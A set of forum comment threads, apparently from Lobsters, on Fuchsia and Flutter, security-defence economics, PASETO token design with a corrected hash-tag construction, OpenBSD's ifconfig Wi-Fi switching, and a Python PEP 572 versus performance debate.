1. 4

    Every time I read over coverage like this I wonder how Flutter will fit in. Are they targeting Dart on Flutter for cross-platform app development? Could Fuschia become the new core for ChromeOS, Android, and WearOS?

    1. 2

      I believe (my opinion, based on observation) that Google wants to compete better in native app experiences to drive more business adoption, and ultimately, their play for Fuschia is as a direct competitor to Windows and macOS. ChromeOS requires being managed by Google’s domain facilities. Fuschia might support arbitrary management through ActiveDirectory, etc, making it a more appealling choice for larger corporations.

      The scary part in this plan is that the “ad team won.” That makes me nervous.

      Flutter/dart is the equivalent of Cocoa/Swift, and .NET/C#, but it happens to work on those other platforms too. So, “Hey native devlopers! Your porting efforts are lesser if you switch to flutter! And then they’ll work on Fuschia, too! We’re attracting tons of new interest. You can be one of the first native apps that works on Fuschia, and maybe be a launch partner.”

    1. 6

      None of these tactics remove or prevent vulnerabilities, and would therefore by rejected by a “defense’s job is to make sure there are no vulnerabilities for the attackers to find” approach. However, these are all incredibly valuable activities for security teams, and lower the expected value of trying to attack a system.

      I’m not convinced. “Perfect” is an overstatement for the sake of simplicity, but effective security measures need to be exponentially more costly to bypass than they are to implement, because attackers have much greater resources than defenders. IME all of the examples this page give are too costly to be worth it, almost all of the time: privilege separation, asset depreciation, exploit mitigation and detection are all very costly to implement while representing only modest barriers to skilled attackers. Limited resources would be better expended on “perfect” security measures; someone who expended the same amount of effort while following the truism and focusing on eliminating vulnerabilities entirely would end up with a more secure system.

      1. 2

        You would end up with a more secure system from attackers with less resources. For example, you can make your system secure to all common methods used by script kiddies but what happens when a state-level actor is attacking your system? In this case and as your threats get more advanced I agree with the article. In higher levels of threats it becomes a problem of economics.

        1. 2

          You would end up with a more secure system from attackers with less resources. For example, you can make your system secure to all common methods used by script kiddies but what happens when a state-level actor is attacking your system?

          I think just the opposite actually. The attitude proposed by the article would lead you to implement things that defended against common methods used by script kiddies (i.e. cheap attacks) but did nothing against funded corporate rivals. Whereas following the truism would lead you to make changes that would protect against all attackers.

          1. 4

            The attitude proposed by the article would lead you to implement things that defended against common methods used by script kiddies (i.e. cheap attacks) but did nothing against funded corporate rivals.

            That’s not what I understand from this article. The attitude proposed by the article should, IMO, lead you to think of the threat model of the system you’re trying to protect.

            If it’s your friend’s blog, you (probably) shouldn’t have to consider state actors. If it’s a stock exchange, you should. If you’re Facebook or Amazon, not the same as lobsters or your sister’s bike repair shop. If you’re a politically exposed individual, exploiting your home automation raspberry pi might be worth more than exploiting the same system belonging to someone who is not a public figure at all.

            Besides that, I disagree that all examples are too costly to be worth it. Hashing passwords is always worth it, or at least I can’t think of a case where it wouldn’t be.

            To summarize with an analogy, I don’t take the exact same care of my bag when my laptop (or other valuables) are in it than when it only contains my water bottle, and Edward Snowden should care more about the software he uses than the ones I use.

            Overall I really like the way of thinking presented by the author!

            1. 2

              Whereas following the truism would lead you to make changes that would protect against all attackers.

              Or mess with your sense of priority such that all vulnerabilities are equally important so “let’s just go for the easier mitigations”, rather than evaluating based on the cost of the attack itself.

              1. 1

                If you’re thinking about “mitigations” you’re already in the wrong mentality, the one the truism exists to protect you against.

                1. 1

                  It’s important to acknowledge that it’s somewhat counterintuitive to think about the actual parties attempting to crack your defenses. It requires more mental work, in a world where people assume they can get all the info they need just by reading their codebase & judging it on its own merits. It requires methodical, needs-based analysis.

                  The present mentality is not a pernicious truism; it’s an attractive fallacy.

          2. 2

            IME all of the examples this page give are too costly to be worth it, almost all of the time: privilege separation, asset depreciation, exploit mitigation and detection are all very costly to implement while representing only modest barriers to skilled attackers.

            How do you figure it’s too costly? If anything, all these things are getting much easier, as they become primitive to deployment environments, and frameworks. Additionally, there are services out there that scan dep. vulnerabilities if you give them a Gemfile, or access to your repo.

            Limited resources would be better expended on “perfect” security measures; someone who expended the same amount of effort while following the truism and focusing on eliminating vulnerabilities entirely would end up with a more secure system.

            Perfect it all you want. The weakest link is still an employee who is hung over and provides their credentials to a fake GMail login page. (Or the equivalent fuck up) If anything, what’s costly is keeping on your employees to not take shortcuts, and on stay alert to missing access cards, rouge network devices in the office, badge surfing, and that they don’t leave their assets lying around.

            1. 1

              If anything, all these things are getting much easier, as they become primitive to deployment environments, and frameworks.

              I’d frame that as: deployment environments are increasingly set up so that everyone pays the costs.

              The weakest link is still an employee who is hung over and provides their credentials to a fake GMail login page. (Or the equivalent fuck up)

              So fix that, with a real security measure like hardware tokens. Thinking in terms of costs to attackers doesn’t make that any easier; indeed it would make you more likely to ignore this kind of attack on the grounds that fake domains are costly.

          1. 5

            Is this token local or public? local: shared-key authenticated encryption, public: public-key digital signatures.

            If someone doesn’t know whether to pick between encrypting or signing or tagging [1] a token, it seems that asking whether the token is local or public could only confuse them. SWEs implementing their own encryption might be foolish, but not understanding the primitive cryptographic operations you can utilize seems to err in the other end of the possible delineations between researchers and practitioners.

            1. since this one is slightly less commonly known — https://en.wikipedia.org/wiki/Message_authentication_code
            1. 1

              If it’s local, you get authenticated encryption. No other choices.

              If it’s public (i.e. the token is signed by one party and verified by another), you get digital signatures.

              That’s the only choice that needs to be made.

              1. 4

                That misses quite a few use-cases, no? Most importantly, tagging, where I don’t need asymmetric signatures and I don’t need encryption, but I want to give you a token you can read but not modify before you pass it back to me.

                Also, why does “local” mean “authenticated encryption”? And “public” mean “digital signatures”? I might be getting dense towards the end of a long week, but the linguistic intuition seems non-obvious.

                1. 3

                  Most importantly, tagging, where I don’t need asymmetric signatures and I don’t need encryption, but I want to give you a token you can read but not modify before you pass it back to me.

                  If you want unencrypted-but-authenticated tokens, stick the raw data in the unencrypted footer. Strictly speaking, your options are AEAD or Ed25519.

                  Also, why does “local” mean “authenticated encryption”? And “public” mean “digital signatures”?

                  Local means local to a system. The issuer is the verifier.

                  Public means it’s not local to a system, it’s going to be transmitted over the public Internet. The issuer is a different entity than the verifier. (It doesn’t make sense to use public-key cryptography for a purely-local use case.)

                  1. 2

                    If you want unencrypted-but-authenticated tokens, stick the raw data in the unencrypted footer.

                    So instead of buttons and levers, there’s more the one place I can stick my data?

                    The issuer is the verifier.

                    The word for that use case is “symmetric”.

                    Public means it’s not local to a system, it’s going to be transmitted over the public Internet.

                    And if the data is public, but the token verification is local (i.e. symmetric), then you stick it in the unencrypted footer. Got it.

                    Hope you don’t take it personally if I stick with { data, tag: SHA(secret + data) } and call it a day ;)

                    1. 7

                      { data, tag: SHA(secret + data) }

                      I hope you don’t stick with that, since I can add my own data and produce a new, but valid SHA, via a length extension attack, no?

                      1. 4

                        Just to really drive this home @anfedorov - the tldr from @apg’s link:

                        HMAC is the real solution. HMAC is designed for securely hashing data with a secret key.

                        1. 1

                          False! HMAC was designed for securely tagging data with poorly constructed hash functions. Sorry not sorry for being pedantic, but apg should really know better than trying to nitpick me ;)

                        2. 1
                          1. 2

                            You didn’t specify SHA3, and are replying months later….

              1. 7

                This is a great usability improvement. Thank you Peter Hessler :)

                That said, it’s still a little bit sad that this is only just being introduced in 2018.

                1. 34

                  That said, it’s still a little bit sad that this is only just being introduced in 2018.

                  Technically - OpenBSD has had various toolings (1, 2, 3 and others) to do this very task for quite a long time. But none of them were considered the correct approach.

                  Also, this is something that’s pretty unique to OpenBSD IMO. The end result is the same as with other systems.. sure. But this is unique among the unix world.

                  Q: What’s the difference?

                  Glad I asked! This is entirely contained within the base system and requires no tools beyond ifconfig!

                  Linux has ip, iw, networkmanager, iwconfig..(likely others)… and they are all using some weird combo of wpa_supplicant.. autogen’d text files.. and likely other things.

                  Have you ever tried to manually configure wireless on linux? It’s a nightmare. Always has been.

                  NetworkManager does a really good job of making it feel like there isn’t a kludge going on behind the scenes.. It does this by gluing all the various tools together so you don’t have to know about them. IMO this is what happens when you “get it done now” vs “do it right”.

                  With great simplicity comes great security:

                  NetworkManager@6c3174f6e0cdb3e0c61ab07eb244c1a6e033ff6e:

                  github.com/AlDanial/cloc v 1.74  T=28.62 s (48.2 files/s, 45506.1 lines/s)
                  --------------------------------------------------------------------------------
                  Language                      files          blank        comment           code
                  --------------------------------------------------------------------------------
                  PO File                          66         125328         161976         457879
                  C                               541          71112          66531         321839
                  C/C++ Header                    528          10430          15928          34422
                  XML                              59           1406           2307           6692
                  make                              6            885            229           5009
                  Python                           40           1189           1128           4597
                  NAnt script                      65            626              0           3968
                  m4                                8            237            123           1958
                  Lua                              11            212            453           1314
                  Bourne Shell                     21            232            238           1115
                  XSLT                              5             65              3            929
                  Perl                              4            166            243            480
                  Bourne Again Shell               11             30             35            241
                  C++                               4             62            121            178
                  YAML                              4             12              6            161
                  JavaScript                        1             33             21            130
                  Ruby                              3             39             92            110
                  Lisp                              2             15             24             23
                  --------------------------------------------------------------------------------
                  SUM:                           1379         212079         249458         841045
                  --------------------------------------------------------------------------------
                  

                  VS

                  ifconfig@1.368:

                  github.com/AlDanial/cloc v 1.74  T=0.12 s (32.2 files/s, 58201.7 lines/s)
                  -------------------------------------------------------------------------------
                  Language                     files          blank        comment           code
                  -------------------------------------------------------------------------------
                  C                                2           1009            345           5784
                  C/C++ Header                     1              7             16             58
                  make                             1              3              1              6
                  -------------------------------------------------------------------------------
                  SUM:                             4           1019            362           5848
                  -------------------------------------------------------------------------------
                  

                  Anyway - I guess my point is this:

                  • Almost every OS achieves this goal.. sure.
                  • Most have had this feature for quite some time.. agree (Including OpenBSD!).
                  • None of them have it implemented as simply and well-thought-out as OpenBSD.
                  1. 5

                    Have you ever tried to manually configure wireless on linux? It’s a nightmare. Always has been.

                    No. The Linux’s I use come with an out-of-the-box experience that makes wireless as easy as clicking a box, clicking a name, typing in the password, it works, and it reconnects when nearby. They have been like that since I bought an Ubuntu-specific Dell a long time ago. They knew it was a critical feature that needed to work easily with no effort with some doing that upon installation so parts of the install could be downloaded over WiFi. Then, they did whatever they had to do in their constraints (time/talent/available code) to get it done.

                    And then I was able to use it with only breaks being wireless driver issues that had answers on Q&A sites. Although that was annoying, I didn’t have to think about something critical I shouldn’t have to think about. Great product development in action for an audience that has other things to do than screw around with half-built wireless services. That’s a complement about what I used rather than a jab at OpenBSD’s which I didn’t use. I’m merely saying quite a few of us appreciate stuff that saves us time once or many times. If common and critical, adoption can go up if it’s a solved problem with minimal intervention out of the box.

                    That said, props to your project member who solved the problem with a minimally-complex solution in terms of code and dependencies. I’m sure that was hard work. I also appreciate you illustrating that for us with your comparisons. The difference is almost comical in the work people put in with very different talents, goals and constraints. And m4 isn’t gone yet. (sighs)

                    1. 7

                      No. The Linux’s I use come with an out-of-the-box experience that makes wireless as easy as clicking a box, clicking a name, typing in the password, it works, and it reconnects when nearby.

                      And then something goes wrong in the fragile mess of misfeatures, and someone has to dig in and debug, or a new feature comes along and someone has to understand the stack of hacks to understand it, before it can be added. There’s something to be said for a system that can be understood.

                      1. 4

                        There is something to be said for a system to be understood. I totally agree. I also think there’s something to be said for a reliable, more-secure system that can be effortlessly used by hundreds of millions of people. A slice of them will probably do things that were worth the effort. The utilitarian in me says make it easy for them to get connected. The pragmatist also says highly-usable, effortless experience leads to more benefits in terms of contributions, donations, and/or business models. These seemingly-contradicting philosophies overlap in this case. I think end justifies the means here. One can always refactor the cruddy code later if it’s just one component in the system with a decent API.

                        1. 3

                          One can always refactor the cruddy code later if it’s just one component in the system with a decent API.

                          The problem isn’t the code, it’s the system that it’s participating in.

                          1. 2

                            One can always refactor the cruddy code later if it’s just one component in the system with a decent API.

                            This just leads to systemd, and more misfeatures…

                            1. 3

                              There’s Linux’s without systemd. Even those that had it didn’t before they got massive adoption/impact/money. So, it doesn’t naturally lead to it. Just bad, decision-making in groups controlling popular OS’s from what I can tell. Then, there’s also all the good stuff that comes with their philosophy that strict OS’s like OpenBSD haven’t achieved. The Linux server market, cloud, desktops, embedded, and Android are worth the drawbacks if assessing by benefits gained by many parties.

                              Personally, I’m fine with multiple types of OS being around. I like and promote both. As usual, I’m just gonna call out anyone saying nobody can critique an option or someone else saying it’s inherently better than all alternatives. Those positions are BS. Things things are highly contextual.

                      2. 1

                        This is really great. I wish all other projects can do that, preferring elegancy to throwing code on the wall, but sometimes life really takes its toll and we cave and just make Frankenstein to get shit done.

                        I really appreciate all the works by OpenBSD folks. Do you have any idea how other *BSD’s deal with the wireless?

                        1. 1

                          Do you have any idea how other *BSD’s deal with the wireless?

                          I don’t - sorry :D

                      3. 3

                        Whats really sad is that the security of other operating systems can’t keep up despite having more man power.

                        1. 2

                          It’s almost like if you prioritize the stuff that truly matters, and be willing to accept a little bit of UX inconvenience, you might happen upon a formula that produces reliable software? Who would have thought?

                          1. 2

                            That’s what I told OpenBSD people. They kept on a poorly-marketed monolith in unsafe language without the methods from CompSci that were knocking out whole classes of errors. They kept having preventable bugs and adoption blockers. Apparently, the other OS developers have similarly, hard-to-change habits and preferences with less focus on predictable, well-documented, robust behavior.

                          2. 1

                            I think this is just a matter of what you think matters. There’s no sadness here. The ability to trade off security for features and vice versa is good. It lets us accept the level of risk we like.

                            On the other hand, it’s really sad, for instance, that OpenBSD has had so many public security flaws compared to my kernel ;P

                            1. 1

                              On the other hand, it’s really sad, for instance, that OpenBSD has had so many public security flaws compared to my kernel ;P

                              What’s your kernel?

                              1. 2

                                It’s a joke. Mine is a null kernel. It has zero code, so no features, so no security flaws. Just like OpenBSD has fewer features and fewer known security flaws than Linux, mine has fewer features but no security flaws.

                                Unlike OpenBSD, mine is actually immune to Meltdown and Spectre.

                                1. 1

                                  Not having public flaws doesn’t mean you don’t have flaws. Could mean not enough people are even considering checking for flaws. ;)

                                  1. 1

                                    Oh OK lol.

                            2. 0

                              That said, it’s still a little bit sad that this is only just being introduced in 2018.

                              Would you like to clarify what you mean by this comment? Cause right now my interpretation of it is that you feel entitled to have complicated features supported in operating systems developed by (largely unpaid) volunteers.

                              1. 11

                                I’m getting a bit tired of every complaint and remark being reduced to entitlement. Yes, I know that there is a lot of unjustified entitlement in the world, and it is rampant in the open source world, but I don’t feel entitled to anything in free or open source software space. As someone trying to write software in my spare time, I understand how hard it is to find spare time for any non-trivial task when it’s not your job.

                                Though I am not a heavy user, I think OpenBSD is an impressive piece of software, with a lot of thought and effort put into the design and robustness of the implementation.

                                I just think it’s somewhat disheartening that something this common (switching wireless networks) was not possible without manual action (rewriting a configuration file, or swapping configuration files, and restarting the network interface) every time you needed to switch or moved from home to the office.

                                Whether you feel like this is me lamenting the fact that there are so few contributors to important open source projects, me lamenting the fact that it is so hard to make time to work on said project, or me being an entitled prick asking for features on software I don’t pay for (in money or in time/effort) is entirely your business.

                                1. 5

                                  Just for the record I didn’t think you sounded entitled. The rest of the comment thread got weirdly sanctimonious for some reason.

                                  Volunteers can work on whatever they want, and anybody’s free to comment on their work. Other operating systems have had the ability to switch wifi networks now for a long time, so it’s fair to call that out. And then Peter went and did something about it which is great.

                                  Previously I’ve been using http://ports.su/net/wireless for wifi switching on my obsd laptop, but will use the new built-in feature when I upgrade the machine.

                                  Some of the delay for the feature may be because the OS, while very capable, doesn’t seem designed to preemptively do things on the user’s behalf. Rather the idea seems to be that the user knows what’s best and will ask the OS to do things. For instance when I dock or undock my machine from an external monitor it won’t automatically switch to using the display. I have a set of dock/undock scripts for that. I appreciate the simple “manual transmission” design of the whole thing. The new wifi feature seems to be in a similar spirit, where you rank each network’s desirability and the OS tries in that order.

                                  1. 2

                                    Interesting, I didn’t know about that to. I used my own bash script to juggle config files and restart the interface, but the new support in ifconfig itself is much easier.

                                    I think the desire for OpenBSD to not do things without explicit user intent are certainly part of why this wasn’t added before, as well as limited use as a laptop OS until relatively recently.

                                  2. 2

                                    Thanks for taking the time to respond.

                                    To be clear, I don’t believe you’re some sort of entitled prick – I don’t even know you. But, I do care that people aren’t berating developers with: “That’s great, but ____” comments. Let’s support each other, instead of feigning gratitude. It wasn’t clear if that’s what you were doing, hence, my request for clarification.

                                    That being said, my comment was poorly worded, and implied a belief that you were on the wrong side of that. That was unfair, and I apologize.

                                    I just think it’s somewhat disheartening that something this common (switching wireless networks) was not possible without manual action (rewriting a configuration file, or swapping configuration files, and restarting the network interface) every time you needed to switch or moved from home to the office.

                                    Well, I’m just not going to touch this…. :eyeroll:

                                    1. 1

                                      I apologize if my response was a little bit snide. I’ve been reading a lot of online commentary that chunks pretty much everything into whatever people perceive as wrong with society (most commonly: racism, sexism, or millenial entitlement - I know these are real and important issues, but not everything needs to be about them). I read your remark in the context and may have been a little harsh.

                                      Regarding the last segment - how WiFi switching worked before - there may have been better ways to do this, but I’m not sure they were part of the default install. When I needed this functionality on OpenBSD, I basically wrote a bash script to do these steps for me on demand, and that worked alright for me. It may not have been the best way, so my view of the OpenBSD WiFi laptop landscape prior to the work of Peter may not be entirely appropriate or accurate.

                                    2. 1

                                      I just think it’s somewhat disheartening that something this common (switching wireless networks) was not possible without manual action (rewriting a configuration file, or swapping configuration files, and restarting the network interface) every time you needed to switch or moved from home to the office.

                                      I’m more blunt here that leaving that to be true in a world with ubiquitous WiFi was a bad idea if they wanted more adoption and donations from market segment that wanted good, out-of-the-box support for WiFi. If they didn’t want that, then it might have been a good choice to ignore it for so long to focus on other things. It all depends on what their goals were. Since we don’t know them, I’ll at least say that it was bad, neutral, or good depending on certain conditions like with anything else. The core userbase was probably OK with whatever they had, though.

                                    3. 3

                                      First, both free speech and hacker culture say that person can gripe about what they want. They’re sharing ideas online that someone might agree with or act on. We have a diverse audience, too.

                                      Second, the project itself has developers that write cocky stuff about their system, mock the other systems, talk that one time about how they expect more people to be paying them with donations, more recently talk about doing things like a hypervisor for adoption, and so on. Any group doing any of that deserves no exception to criticism or mockery by users or potential users. It’s why I slammed them hard in critiques, only toning it down for the nice ones I met. People liking critiques of other projects or wanting adoption/donations should definitely see others’ critiques of their projects, esp if its adoption/donation blockers. I mean, Mac’s had a seemless experience called Rendevous or something in 2002. If I’m reading the thread right, that was 16 years before OpenBSD something similar they wanted to make official. That OpenBSD members are always bragging when they’re ahead of other OS’s on something is why I’m mentioning it. Equal treatment isn’t always nice.

                                      “But, I do care that people aren’t berating developers with: “That’s great, but ____” comments. Let’s support each other, instead of feigning gratitude. It wasn’t clear if that’s what you were doing, hence, my request for clarification.”

                                      I did want to point out that we’ve had a lots of OpenBSD-related submissions and comments with snarky remarks about what other developers or projects were doing. I at least don’t recall you trying to shut them down with counterpoints assessing their civility or positivity toward other projects (say NetBSD or Linux). Seems a little inconsistent. My memory is broken, though. So, are you going to be countering every negative remark OpenBSD developers or supporters make about projects with different goals telling them to be positive and supportive only? A general rule of yours? Or are you giving them a pass for some reason but applying the rule to critics of OpenBSD choices?

                                      1. 1

                                        I at least don’t recall you trying to shut them down with counterpoints assessing their civility or positivity toward other projects (say NetBSD or Linux). Seems a little inconsistent.

                                        I’m not the Internet Comment Police, but you seem to think you are for some reason… Consider this particular instance “me griping about what I want.”

                                        Or are you giving them a pass for some reason but applying the rule to critics of OpenBSD choices?

                                        This wasn’t about OpenBSD at all. This started out as a request for clarification on the intent of an ambiguous comment that seemed entitled. There seems to be a lot of that happening today, and a lot of people defending it for whatever reason, which is even worse.

                                        1. 1

                                          I’m not the Internet Comment Police

                                          Your comments came off that way to me between the original and follow-ups. Far as not about OpenBSD, it’s in a thread on it with someone griping it lacked something they wanted. The OpenBSD members griping about third party projects not having something they wanted to see more of typically got no comment from you. The inconsistency remains. I’m writing it off as you’re just a fan of their style of thinking on code, quality, or something.

                                      2. 2

                                        i think he’s sad that there haven’t been enough volunteers to make it happen sooner

                                        1. 2

                                          That’s certainly one possibility, but not how I took it initially, and why I asked for clarification. I’ve seen too many people over the years attempt to disguise their entitlement by saying “thanks.”

                                          I’d have liked to see this comment worded as:

                                          This is a great usability improvement. Thank you Peter Hessler :) It’s a shame that there isn’t a better way to bring these important usability features to OpenBSD faster. What is the best way to help make that happen? Donations to the OpenBSD Foundation? Sponsor the work directly? Something else?

                                          Now, it’s also possible that the OP has ties to OpenBSD, and the comment was self-deprecating. But, one can’t infer that from the information we see without investigating who the OP is, and their affiliations…

                                          1. 0

                                            one can’t infer anything beyond what they said

                                            1. 2

                                              I’m not sure you understand what infer means. One certainly can infer meaning from a comment, based on previous actions, comments, etc..

                                              My point remains: It’d be nice if the OP would clarify what they mean. My interpretation of the OP’s comment is just as likely as your interpretation. My interpretation is damaging to the morale of existing volunteer contributors to FOSS, and gives potential contributors to FOSS reasons to not contribute all together. I don’t know about you, but I want to encourage people to contribute to FOSS, as doing so moves us closer to a free and open society. And, that alone, is the reason I’m even bothering to continue responding to this thread…

                                              1. 1

                                                he said “it’s sad.” that’s all we know. the leap is that this means “entitlement.”

                                                1. 1

                                                  “It’s pretty sad that it took someone else so long to prioritize work I think is necessary.”

                                                  I think it’s pretty easy to take what was written and read it this way. But maybe my glass is half empty today.

                                                2. 0

                                                  One can infer based on a comment, but the inference will most likely be dimwitted bullshit.

                                                  Without the magic trifecta of body language, vocal intonation, and facial expression us monkeys are just shit at picking up on any extra meaning. So take the comment at face value.

                                                  It expresses gratitude, it focuses on a specific recipient, and it lauds the feature. After, it regrets that it couldn’t/didn’t happen earlier.

                                                  There’s no hidden meaning here, and if the commenter intended a hidden meaning he’s a dufus too, because there’s no unicode character for those. U+F089A6CDCE ZERO WIDTH SARCASTIC FUCK YOU MARK notwithstanding.

                                                  At some point we all need to stop insisting that we have near-telepathic powers, especially outside of meatspace.

                                                  1. 2

                                                    So, what you’re saying is that I can write anything I want, and since you can’t see or hear other clues, there’s no way you can downvote (in good faith) this comment as trolling?

                                                    Not sure text works that way…

                                            2. 1

                                              They had the solution to do it all the time, but it wasn’t invented here, so it’s bad.

                                        1. -1

                                          As one insignificant user of this language, please stop adding these tiny edge case syntax variations and do something about performance. But I am one small insignificant user …

                                          1. 56

                                            This is exactly the attitude that leads to maintainers’ burn outs.

                                            Do realize this:

                                            • Adding syntax variations is not done at the expense of performance, different volunteers are working on what’s more interesting to them.
                                            • Python is not a product, and you’re not a paying customer, you don’t get to say “do this instead of that” because none of the volunteer maintainers owes you to produce a language for you. Just walking by and telling people what to do with their project is at the very least impolite.
                                            • If you want something to happen in an open source project, volunteer to do it.

                                            (None of this is aimed at you personally, I don’t know who you are. I’m dissecting an attitude that you’ve voiced, it’s just all too common.)

                                            1. 23

                                              Python is not a product, and you’re not a paying customer, you don’t get to say “do this instead of that” because none of the volunteer maintainers owes you to produce a language for you. Just walking by and telling people what to do with their project is at the very least impolite.

                                              I agree with the general direction of your post, but Python is a product and it is marketed to people, through the foundation and advocacy. It’s not a commercial product (though, given the widespread industry usage, you could argue it somewhat is). It’s reasonable of users to form expectations.

                                              Where it goes wrong is when individual users claim that this also means that they need to be consulted or their consultation will steer the project to the better. http://www.ftrain.com/wwic.html has an interesting investigation of that.

                                              1. 2

                                                Where it goes wrong is when users claim that this also means that they need to be consulted or their consultation will steer the project to the better.

                                                Wait, who is the product being built for, if not the user? You can say I am not a significant user, so my opinion is not important, as opposed to say Google which drove Python development for a while before they focused on other things, but as a collective, users’ opinions should matter. Otherwise, it’s just a hobby.

                                                1. 5

                                                  Sorry, I clarified the post: “individual users”. There must be a consultation process and some way of participation. RFCs or PEPs provide that.

                                                  Yet, what we regularly see is people claiming how the product would be a better place if we listened to them (that, one person we never met). Or, alternatively, people that just don’t want to accept a loss in a long-running debate.

                                                  I don’t know if that helps clarifying, it’s a topic for huge articles.

                                                  1. 3

                                                    I often find what people end up focusing on - like this PEP - is bike shedding. It’s what folks can have an opinion on after not enough sleep and a zillion other things to do and not enough in depth knowledge. Heck I could have an opinion on it. As opposed to hard problems like performance where I would not know where to start, much less contribute any code, but which would actually help me and, I suspect, many other folks, who are with some sighing, migrating their code to Julia, or, like me, gnashing their teeth at the ugliness of Cython.

                                                    1. 4

                                                      Yeah, it’s that kind of thing. I take a harsh, but well-structured opinion any time and those people are extremely important. What annoys me is people following a tweet-sized mantra to the end, very much showing along the path that they have not looked at what is all involved or who would benefit or not knowing when to let go off a debate.

                                              2. 17

                                                Adding syntax variations is not done at the expense of performance, different volunteers are working on what’s more interesting to them.

                                                Regrettably, a lot of languages and ecosystems suffer greatly from the incoherence that this sort of permissive attitude creates.

                                                Software is just as much about what gets left out as what gets put in, and just because Jane Smith and John Doe have a pet feature they are excited about doesn’t mean they should automatically be embraced when there are more important things on fire.

                                                1. 8

                                                  the incoherence that this sort of permissive attitude creates

                                                  The Haskell community would’ve just thrown PEP 572 behind {-# LANGUAGE Colonoscopy #-} and been done with it.

                                                  Sure, this doesn’t get us out of jail free with regard to incoherence, but it kicks down the problem from the language to the projects that choose to opt-in.

                                                  1. 2

                                                    I find it hard to see this as a good thing. For me, it mostly highlights why Haskell is a one-implementation language… er, 2 ^ 227 languages, if ghc --supported-extensions | wc -l is to be taken literally. Of course, some of those extensions are much more popular than others, but it really slows down someone trying to learn “real world” Haskell by reading library code.

                                                    1. 2

                                                      Of course, some of those extensions are much more popular than others

                                                      Yeah, this is a pretty interesting question! I threw some plots together that might help explore it, but it’s not super conclusive. As with most things here, I think a lot of this boils down to personal preference. Have a look:

                                                      https://gist.github.com/atondwal/ee869b951b5cf9b6653f7deda0b7dbd8

                                                  2. 4

                                                    Yes. Exactly this. One of the things I value about Python is its syntactic clarity. It is the most decidedly un-clever programming language I’ve yet to encounter.

                                                    It is that way at the expense of performance, syntactic compactness, and probably some powerful features that could make me levitate and fly through the air unaided if I learned them, but I build infrastructure and day in, day out, Python gets me there secure in the knowledge that I can pick up anyone’s code and at the VERY LEAST understand what the language is doing 99% of the time.

                                                  3. 4

                                                    I find that “people working on what interests them” as opposed to taking a systematic survey of what use cases are most needed and prioritizing those is a hard problem in software projects, and I find it curious that people think this is not a problem to be solved for open source projects that are not single writer/single user hobby projects.

                                                    Python is interesting because it forms core infrastructure for many companies, so presumably they would be working on issues related to real use cases. Projects like numpy and Cython are examples of how people see an important need (performance) and go outside the official language to get something done.

                                                    “If you want something to happen in an open source project, volunteer to do it.” is also one of those hostile attitudes that I find curious. In a company with a paid product of course that attitude won’t fly, but I suspect that if an open source project had that attitude as a default, it would gradually lose users to a more responsive one.

                                                    As an example, I want to use this response from a library author as an example of a positive response that I value. This is a library I use often for a hobby. I raised an issue and the author put it in the backlog after understanding the use case. They may not get to it immediately. They may not get to it ever based on prioritization, but they listened and put it on the list.

                                                    Oddly enough, I see this kind of decent behavior more in the smaller projects (where I would not expect it) than in the larger ones. I think the larger ones with multiple vendors contributing turn into a “pay to play” situation. I don’t know if this is the ideal of open source, but it is an understandable outcome. I do wish the hostility would decrease though.

                                                    1. 12

                                                      Performance has never been a priority for Python and this probably won’t change, because as you said, there are alternatives if you want Python’s syntax with performance. Also its interoperability with C is okeish and that means that the small niche of Python’s users that use it for performance critical operations that are not already supported by Numpy, Numba and so on, will always be free to go that extra mile to optimize their code without much trouble compared to stuff like JNI.

                                                      If you want raw performance, stick to C/C++ or Rust.

                                                      1. 3

                                                        I also observe the same tendency of smaller projects being more responsive, but I think the issue is scale, not “pay to play”. Big projects get so much more issue reports but their “customer services” are not proportionally large, so I think big projects actually have less resource per issue.

                                                      2. 0

                                                        He did say “please”.

                                                      3. 7

                                                        please stop adding these tiny edge case syntax variations and do something about performance.

                                                        There’s a better forum, and approach, to raise this point.

                                                        1. 2

                                                          I guess you are saying my grass roots campaign to displace “Should Python have :=” with “gradual typing leading to improved performance” as a higher priority in the Python world is failing here. I guess you are right :)

                                                        2. 1

                                                          Have you tried Pypy? Have you tried running your code through Cython?

                                                          Have you read any of the zillion and one articles on improving your Python’s performance?

                                                          If the answer to any of these is “no” then IMO you lose the right to kvetch about Python’s performance.

                                                          And if Python really isn’t performant enough for you, why not use a language that’s closer to the metal like Rust or Go or C/C++?

                                                          1. 6

                                                            Yes to all of the above. But not understanding where all the personal hostility is coming from. Apparently having the opinion that “Should := be part of Python” is much less important than “Let’s put our energies towards getting rid of the GIL and creating a kickass implementation that rivals C++” raises hackles. I am amused, entertained but still puzzled at all the energy.

                                                            1. 5

                                                              There was annoyance in my tone, and that’s because I’m a Python fan, and listening to people kvetch endlessly about how Python should be something it isn’t gets Ooooold when you’ve been listening to it for year upon year.

                                                              I’d argue that in order to achieve perf that rivals C++ Python would need to become something it’s not. I’d argue that if you need C++ perf you should use C++ or better Rust. Python operates at a very high level of abstraction which incurs some performance penalties. Full stop.

                                                              1. 5

                                                                This is an interesting, and puzzling, attitude.

                                                                One of the fun things about Cython was watching how the C++ code generated approaches “bare metal” as you add more and more type hints. Not clear at all to me why Python can not become something like Typed Racket, or LISP with types (I forget what that is called) that elegantly sheds dynamism and gets closer to the metal the more type information it gets.

                                                                Haskell is a high level language that compiles down to very efficient code (barring laziness and thunks and so on).

                                                                Yes, I find this defense of the slowness of Python (not just you but by all commentators here) and the articulation that I, as one simple, humble user, should just shut up and go away kind of interesting.

                                                                I suspect that it is a biased sample, based on who visits this post after seeing the words “Guido van Rossum”

                                                                1. 8

                                                                  My hypothesis is that people who want performance are minority among Python users. I contributed to both PyPy and Pyston. Most Python users don’t seem interested about either.

                                                                  1. 3

                                                                    For me that has been the most insightful comment here. I guess the vast majority of users employ it as glue code for fast components, or many other things that don’t need performance. Thanks for working on pypy. Pyston I never checked out.

                                                                  2. 5

                                                                    Not clear at all to me why Python can not become something like Typed Racket, or LISP with types (I forget what that is called) that elegantly sheds dynamism and gets closer to the metal the more type information it gets.

                                                                    Isn’t that what mypy is attempting to do? I’ve not been following Python for years now, so really have no horse in this race. However, I will say that the number of people, and domains represented in the Python community is staggering. Evolving the language, while keeping everyone happy enough to continue investing in it is a pretty amazing endeavor.

                                                                    I’ll also point out that Python has a process for suggesting improvements, and many of the core contributors are approachable. You might be better off expressing your (valid as far as I can see) concerns with them, but you might also approach this (if you care deeply about it) by taking on some of the work to improve performance yourself. There’s no better way to convince people that an idea is good, or valid than to show them results.

                                                                    1. 4

                                                                      Not really. Mypy’s goal is to promote type safety as a way to increase program correctness and reduce complexity in large systems.

